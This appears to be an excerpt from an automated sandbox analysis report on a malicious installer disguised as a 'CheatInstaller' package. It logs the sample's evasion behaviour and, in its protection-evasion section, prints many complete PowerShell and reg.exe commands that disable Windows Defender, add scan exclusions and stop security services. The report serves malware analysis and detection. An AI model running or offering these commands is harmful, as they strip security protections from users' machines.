            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: 91D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeMemory allocated: 1B227BA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeMemory allocated: 1B2414C0000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeWindow / User API: threadDelayed 2111
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2603
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7173
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2025
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7734
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC26F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC30F.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi3348.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC28.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI12E1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9F3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC2DF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF889.tmpJump to dropped file
            Source: C:\Windows\System32\svchost.exe TID: 7044Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe TID: 5692Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe TID: 5968Thread sleep count: 2111 > 30
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe TID: 5968Thread sleep time: -52775s >= -30000s
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe TID: 408Thread sleep count: 200 > 30
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe TID: 6956Thread sleep count: 98 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep count: 2603 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4368Thread sleep count: 7173 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep count: 2025 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376Thread sleep count: 7734 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2880Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeThread sleep count: Count: 2111 delay: -25
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build\lib
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI551D.tmp "C:\Windows\Installer\MSI551D.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 /nobreak
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
